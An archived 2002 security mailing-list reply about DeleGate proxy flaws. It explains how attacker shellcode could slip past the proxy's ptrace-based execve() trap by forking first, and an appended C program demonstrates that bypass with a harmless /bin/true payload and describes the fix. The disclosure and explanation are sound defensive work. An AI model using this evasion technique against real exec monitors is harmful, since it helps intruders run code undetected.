Re: [Global InterSec 2002012101] DeleGate Application Proxy - Multiple Vulnerabilities

From: Tom Parker (tomat_private)
Date: Tue Feb 12 2002 - 02:38:08 PST


    Kris
    
     > These vulnerabilities were publicized several years ago; the
     > developers appear to have made some effort to clean up the code, but
     > given the condition it was in to begin with it's not really any
     > surprise there are many problems remaining.
    
    As stated in the advisory, other vulnerabilities in delegate haven't been
    uncommon in the past. However, no one seems to have yet stepped out
    and outlined the sheer severity and number of them which exist.
    Nor has anyone outlined that the workarounds the author introduced
    do little or no good toward preventing the bugs from being exploited.
    
    In answer to Kojima Hajime's question:
    
     > And, delegate has execve(2) trap (-Tx). Can you break it?
    
    Yes - a couple of methods spring to mind.
    When a process calling execve() is being ptrace()'d, a SIGTRAP will be sent,
    which is caught by the signal handlers in delegate and handled accordingly,
    
    ie:
    
    forkspawn.c, lines 114-117:
    
        if( sig == SIGTRAP ){
            if( lNOEXEC() )
                ptraceKill(pid);
            else ptraceContinue(pid,0);
    
    If we had control of the parent (which we don't), you could overwrite
    the execve trap by adding another (NULL) signal handler for the event in
    your shellcode.
    
    However, if I were to have time to write a proof of concept (c), I'd attempt
    to execute the execve() after fork()'ing in my shellcode. For example:
    
        if (fork () == 0) { execve-shellcode(); }
    
    You can also use ptrace within your shellcode to deceive the watcher (parent)
    process. I haven't had time to investigate this technique with delegate
    right now; the original advisory will be updated with additional information
    on this when I've had time to prove it works ;-)
    
    Regards
    Tom Parker
    
    --------------------------------------------------------------------------------------------------
    Tom Parker - tomat_private
    Global Intersec LLC California +1 888 797 3262
    --------------------------------------------------------------------------------------------------
    "Stupidity cannot be cured with money or through
    education or by legislation. Stupidity is not a sin,
    the victim can't help being stupid. But stupidity
    is the only universal capital crime; the sentence
    is death there is no appeal and execution is
    carried out automatically and without pity."
      -Robert Heinlein
    --------------------------------------------------------------------------------------------------
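The fork-first escape that the message above sketches, as an added example that is not part of the original post, the Global InterSec advisory, or the DeleGate source. It is Linux-specific C: the watcher is a stand-in for DeleGate's -Tx trap, written to the same logic as the forkspawn.c fragment quoted in the message (a SIGTRAP stop after execve() means kill the worker, anything else is passed through), and the worker plays the role of attacker shellcode that exec's /bin/true either directly or from a forked grandchild. The function names run_under_trap/worker, the TRAP_* result codes and the exit codes 77/78 are constructed conventions for this example, not anything from DeleGate.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcomes of run_under_trap(). */
#define TRAP_EXEC_BLOCKED   0   /* watcher saw the post-execve SIGTRAP and killed the worker */
#define TRAP_EXEC_ESCAPED   1   /* the exec'd program ran to completion, unnoticed */
#define TRAP_UNAVAILABLE  (-1)  /* PTRACE_TRACEME refused (sandbox, Yama ptrace_scope, ...) */
#define TRAP_ERROR        (-2)  /* fork/exec failure unrelated to the trap */

#define EXIT_NO_PTRACE    77    /* constructed exit code: worker could not request tracing */
#define EXIT_EXEC_FAILED  78    /* constructed exit code: execve() returned */

/* The "worker" side: what attacker-controlled shellcode running inside the
 * traced child would do.  direct=1 calls execve() straight away, which the
 * watcher catches.  direct=0 is the fork-first variant from the post: tracing
 * is not inherited across fork(), so the grandchild's execve() raises no
 * SIGTRAP in any process the watcher is tracing. */
static void worker(int direct)
{
    char *const argv[] = { "/bin/true", NULL };   /* harmless stand-in for a real payload */
    char *const envp[] = { NULL };

    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
        _exit(EXIT_NO_PTRACE);

    if (direct) {
        execve("/bin/true", argv, envp);          /* traced: kernel sends SIGTRAP on success */
        _exit(EXIT_EXEC_FAILED);
    }

    pid_t g = fork();
    if (g == 0) {
        execve("/bin/true", argv, envp);          /* untraced grandchild: no SIGTRAP */
        _exit(EXIT_EXEC_FAILED);
    }
    if (g < 0)
        _exit(EXIT_EXEC_FAILED);

    int st;
    waitpid(g, &st, 0);
    /* Report the grandchild's outcome as our own exit status: 0 if /bin/true ran. */
    _exit(WIFEXITED(st) ? WEXITSTATUS(st) : EXIT_EXEC_FAILED);
}

/* The "watcher" side, modelled on the forkspawn.c fragment: fork a worker and
 * if it stops with SIGTRAP (what the kernel raises in a tracee after a
 * successful execve() when PTRACE_O_TRACEEXEC is not set) kill it.  Any other
 * stop, e.g. the worker's own SIGCHLD, is passed back through PTRACE_CONT. */
int run_under_trap(int direct)
{
    pid_t pid = fork();
    if (pid < 0)
        return TRAP_ERROR;
    if (pid == 0)
        worker(direct);                           /* never returns */

    for (;;) {
        int st;
        if (waitpid(pid, &st, 0) < 0)
            return TRAP_ERROR;

        if (WIFSTOPPED(st)) {
            int sig = WSTOPSIG(st);
            if (sig == SIGTRAP) {
                kill(pid, SIGKILL);               /* the ptraceKill(pid) branch */
                continue;                         /* reap the corpse on the next round */
            }
            ptrace(PTRACE_CONT, pid, NULL, (void *)(long)sig);   /* the ptraceContinue branch */
            continue;
        }
        if (WIFSIGNALED(st))
            return WTERMSIG(st) == SIGKILL ? TRAP_EXEC_BLOCKED : TRAP_ERROR;
        if (WIFEXITED(st)) {
            int code = WEXITSTATUS(st);
            if (code == 0)              return TRAP_EXEC_ESCAPED;
            if (code == EXIT_NO_PTRACE) return TRAP_UNAVAILABLE;
            return TRAP_ERROR;
        }
    }
}

int main(void)
{
    static const char *names[] = { "blocked", "escaped" };
    int d = run_under_trap(1), f = run_under_trap(0);
    printf("direct execve : %s\n", d >= 0 ? names[d] : "ptrace unavailable / error");
    printf("fork+execve   : %s\n", f >= 0 ? names[f] : "ptrace unavailable / error");
    return 0;
}
```

Run as-is, the direct execve() is reported as blocked while the fork-then-execve() is reported as escaped, for the reason the post gives: the grandchild is a fresh, untraced process, so its execve() never produces a SIGTRAP the watcher can see. Where ptrace is denied (a seccomp-restricted container, Yama ptrace_scope=3) both calls report the trap as unavailable rather than guessing. A watcher that wanted to close this particular hole would have to set PTRACE_O_TRACEFORK (and TRACEVFORK/TRACECLONE) via PTRACE_SETOPTIONS so that new children start out traced; note also that it must re-inject non-SIGTRAP stops with PTRACE_CONT, as this one does, because a tracee's ignored signals such as SIGCHLD still stop it, and swallowing them would leave the worker stuck.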
    



    This archive was generated by hypermail 2b30 : Wed Feb 13 2002 - 21:11:51 PST